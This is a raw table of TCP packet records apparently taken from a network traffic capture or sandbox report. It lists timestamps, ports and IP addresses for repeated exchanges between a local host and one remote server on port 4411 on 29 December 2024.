Dec 29, 2024 09:50:37.907749891 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:38.077884912 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:38.081916094 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:38.201229095 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:38.403706074 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:38.523065090 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:38.523125887 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:38.642467976 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:38.642527103 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:38.761871099 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:38.761923075 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:38.855269909 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:38.881191015 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:38.881239891 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:39.000621080 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:39.000686884 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:39.065639973 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:39.120249033 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:39.125210047 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:39.211107969 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:39.244554043 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:39.245347023 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:39.318907976 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:39.365046024 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:39.365181923 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:39.421416044 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:39.484988928 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:39.485075951 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:39.574975014 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:39.604461908 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:39.604568005 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:39.724451065 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:40.109210968 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:40.228688955 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:40.228732109 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:40.348047972 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:40.348098993 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:40.467395067 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:40.467446089 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:40.560743093 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:40.586757898 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:40.586807013 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:40.706129074 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:40.797190905 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:40.799213886 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:40.916824102 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:40.916884899 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:40.918711901 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:40.918759108 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:41.036170959 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:41.036309004 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:41.038022995 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:41.050940990 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:41.171251059 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:41.196472883 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:41.204226971 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:41.323502064 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:41.419394016 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:41.421216011 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:41.540523052 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:41.631320953 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:41.632142067 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:41.751540899 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:42.247484922 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:42.367563009 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:42.367624044 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:42.487152100 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:42.487200022 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:42.606544971 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:42.606628895 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:42.699142933 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:42.725939989 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:42.725986958 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:42.845216990 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:42.845268965 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:42.909379959 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:42.909427881 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:42.964586020 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:42.964662075 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:43.028745890 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:43.055664062 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:43.124640942 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:43.124721050 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:43.244059086 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:43.306431055 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:43.309216022 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:43.428807974 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:43.454818964 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:43.457217932 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:43.624406099 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:43.624505043 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:43.639295101 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:43.743792057 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:43.743908882 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:43.863264084 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:43.997464895 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:44.117063046 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:44.266999006 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:44.267987967 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:44.387336016 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:44.387387991 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:44.477066040 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:44.477123022 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:44.507225037 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:44.507272005 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:44.596529007 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:44.596579075 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:44.626594067 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:44.715987921 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:44.716188908 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:44.835617065 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:44.835670948 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:44.920968056 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:44.921024084 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:44.955039024 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:44.955130100 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:45.040301085 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:45.045968056 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:45.046169043 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:45.136493921 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:45.144335985 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:45.165551901 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:45.264271975 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:45.267323017 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:45.386782885 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:45.386893034 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:45.418958902 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:45.548456907 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:45.548743010 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:45.597278118 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:45.668072939 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:45.668200970 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:45.787518024 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:45.787707090 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:45.907179117 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:45.944504976 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:45.946338892 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:46.065773010 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:46.242157936 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:46.243164062 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:46.362405062 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:46.362452030 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:46.481901884 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:46.482012987 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:46.601465940 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:46.638103962 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:46.757576942 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:46.757618904 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:46.859637976 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:46.876965046 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:46.877131939 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:46.996491909 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:47.069868088 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:47.070657969 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:47.190884113 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:47.192303896 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:47.207036018 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:47.264231920 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:47.322906971 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:47.324337006 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:47.401350021 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:47.401427984 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:47.484435081 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:47.488303900 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:47.520744085 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:47.533206940 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:47.577227116 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:47.648483038 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:47.648608923 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:47.768457890 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:48.162862062 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:48.163875103 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:48.283226967 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:48.341264009 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:48.460592985 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:48.482157946 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:48.601433992 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:48.601489067 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:48.721096992 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:48.721149921 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:48.793145895 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:48.793200016 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:48.840790033 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:48.840867996 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:48.912488937 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:48.960290909 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:49.003676891 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:49.004491091 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:49.123193979 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:49.123728991 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:49.124073029 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:49.243333101 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:49.333291054 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:49.337934017 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:49.453859091 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:49.456587076 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:49.457189083 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:49.575984955 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:49.576066971 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:49.695404053 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:50.185286999 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:50.304502964 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:50.372524977 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:50.491916895 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:50.491974115 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:50.611361980 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:50.611416101 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:50.636898994 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:50.762767076 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:50.772397995 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:50.772449017 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:50.891715050 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:50.891769886 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:50.892560959 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:51.052529097 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:51.052603960 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:51.101243019 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:51.172059059 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:51.179347038 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:51.298604965 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:51.355958939 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:51.362068892 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:51.481441975 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:51.485255003 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:51.509171009 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:51.575259924 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:51.648452044 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:51.648617983 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:51.692003012 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:51.763637066 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:51.768022060 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:51.769311905 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:51.892700911 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:51.983669043 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:51.988006115 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:52.107547998 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:52.153625011 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:52.273025990 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:52.273077965 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:52.392797947 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:52.466319084 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:52.585700035 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:52.585743904 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:52.619465113 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:52.619513988 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:52.738960981 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:52.739017963 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:52.796384096 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:52.796451092 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:52.912440062 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:52.912616014 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:52.915606976 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:52.915757895 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:53.032021999 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:53.032069921 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:53.125986099 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:53.126035929 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:53.151452065 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:53.159354925 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:53.242702007 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:53.245309114 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:53.251343966 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:53.278872013 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:53.361998081 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:53.370687008 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:53.371088028 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:53.455858946 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:53.490480900 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:53.490731001 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:53.581276894 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:53.610078096 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:53.611663103 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:53.700978041 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:53.731070042 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:53.731328964 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:53.820746899 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:53.850694895 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
